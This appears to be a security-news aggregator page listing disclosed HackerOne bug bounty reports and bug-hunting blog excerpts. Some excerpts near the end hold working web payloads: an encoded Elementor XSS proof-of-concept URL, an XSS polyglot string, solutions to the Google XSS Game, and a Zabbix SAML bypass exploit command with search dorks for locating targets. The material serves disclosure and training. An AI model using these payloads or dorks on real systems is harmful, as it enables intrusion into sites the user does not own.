[Java]: CWE-625 – Query to detect regex dot bypass
GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 - Bounty: $1000 [Source]
[JAVA]: Partial Path Traversal
GitHub Security Lab disclosed a bug submitted by smehta23: https://hackerone.com/reports/1678405 - Bounty: $1800 [Source]
Reddit talk promotion offers don’t expire, allowing users to accept them after being demoted
Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 - Bounty: $1000 [Source]
Bypass two-factor authentication
Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 - Bounty: $250 [Source]
jira discloser information
Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612 [Source]
Generated passwords are not fully validated by HIBPValidator
Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 - Bounty: $100 [Source]
Bypassing authorization of linked Instagram account
TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 - Bounty: $170 [Source]
IDOR allows an attacker to modify the links of any user
Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 - Bounty: $5000 [Source]
Open Redirect on www.redditinc.com via `failed` query param bypass after fixed bug #1257753
Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 - Bounty: $200 [Source]
Unrestricted File Upload on reddit.secure.force.com
Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 - Bounty: $100 [Source]
Password Policy Restriction Bypass
Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 - Bounty: $250 [Source]
Lack of Packet Sanitation in Goflow Results in Multiple DoS Attack Vectors and Bugs
Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 - Bounty: $500 [Source]
no rate limit in forgot password session
Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970 [Source]
Open Redirect
Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 - Bounty: $258 [Source]
XSS in Widget Review Form Preview in settings
Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 - Bounty: $500 [Source]
DNS rebinding in –inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)
Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921 [Source]
Take over subdomains of r2.dev using R2 custom domains
Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 - Bounty: $1125 [Source]
CSV export/import functionality allows administrators to modify member and message content of a workspace
Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 - Bounty: $250 [Source]
Directory Listing vulnerability on .packet8.net/php/include/
8x8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846 [Source]
Server-side request forgery (ssrf)
Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240 [Source]
password field autocomplete enabled
Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773 [Source]
CORS Misconfiguration on Yelp
Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616 [Source]
XSS Reflected on reddit.com via url path
Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 - Bounty: $5000 [Source]
insecure gitlab repositories at [HtUS]
U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 - Bounty: $500 [Source]
Main Domain Takeover at https://www.marketo.net/
Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914 [Source]
Reflected xss on videostore.mtnonline.com
MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248 [Source]
CVE-2022-35948: CRLF Injection in Nodejs undici via Content-Type
Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 - Bounty: $600 [Source]
[CVE-2022-35949]: undici.request vulnerable to SSRF using absolute / protocol-relative URL on pathname
Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 - Bounty: $1200 [Source]
Hey Google, Talk to Feedly
Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even...
Leo understands funding events, product launches, and partnership announcements
Easily track key business events like funding events, product launches, or partnerships. Industries are changing at a faster pace than ever. Keeping up with new threats and opportunities can be overwhelming and time-consuming. Today, we’re excited to announce a new Leo skill that lets you easily track key strategic moves...
Meet the New Feedly Dark Theme and Navigation Bar
We’re excited to launch a new version of the Feedly Web UI that improves the navigation and adds support for a cool dark theme. Here’s a quick demo of the new Feedly dark theme and left navigation bar updates: More visible Add Content (+) The profile and add content are...
New reward system to accelerate learning and growth on Detectify
The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs. [Source]
How To Hack Web Applications in 2022: Part 2
The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs. [Source]
SSRF vulnerabilities and where to find them
The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs. [Source]
Module disclosures now available for hackers on Detectify Crowdsource
The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs. [Source]
Account hijacking using “dirty dancing” in sign-in OAuth-flows
The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs. [Source]
Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation
The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs. [Source]
How to: Look for TLS private keys on Docker Hub
The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs. [Source]
Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking
The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs. [Source]
Leveraging AWS QuickSight dashboards to visualize recon data
The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs. [Source]
How To Hack Web Applications in 2022: Part 1
The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs. [Source]
CVE 2022-29455 is still affecting millions of WordPress sites
– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions. This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin. Reference: – https://nvd.nist.gov/vuln/detail/CVE-2022-29455 – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from...
The Time Machine — Weaponizing WaybackUrls for Recon, BugBounties , OSINT, Sensitive Endpoints and what not
You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and can fetch the endpoints from web applications to do further exploitation, don’t believe me xD You will after Travelling from TheTimeMachine, PS Doesn’t...
Zabbix – SAML SSO Authentication Bypass
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: shodan-query: http.favicon.hash:892542951 fofa-query: app="ZABBIX-监控系统" && body="saml" usage nuclei -l target.txt -tags zabbix python3 zabbix_session_exp.py -t https:target.com...
Ultimate XSS Polyglot
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e [Source]
eG Manager v7.1.2: Improper Access Control lead to Remote Code Execution (CVE-2020-8591)
Improper Access Control to Remote Code Execution (CVE-2020-8591) In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely. Impact The Improper Access Control weakness...
How I Found My First Bug Reflected Xss On PIA.GOV.PH(Philippine Information Agency)
Hi guys ,This is Neil Harvey Miñano a Newbie security researcher from Philippine.This is my 1st write-up and also I am not good at XSS so forgive all mistakes.It was 04/20/2021 and my 1st day of bug hunting.I’m still newbie!Today I am gonna to Share a Reflected Xss vulnerability what...
The Most used Chrome Extensions are Used For Penetration Testing.
Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are...
Google XSS Game
https://xss-game.appspot.com/ Level #1: Hello, world of XSShttps://xss-game.appspot.com/level1Solution: <script>alert('xss')</script>hint: inspect the source code of the page Level #2: Persistence is keyhttps://xss-game.appspot.com/level2Solution: <img src=x onerror=alert('XSS')>hint: “welcome” post contains HTML Level #3: That sinking feeling…https://xss-game.appspot.com/level3/frame#1Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'> Level #4: Context mattershttps://xss-game.appspot.com/level4/frameSolution: timer=');alert('xss Level #5: Breaking protocolhttps://xss-game.appspot.com/level5/frameSolution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss') Level #6: Follow the Xhttps://xss-game.appspot.com/level6/frame#/static/gadget.jsSolution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')...
Interview With Open Bug Bounty
Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/ [Source]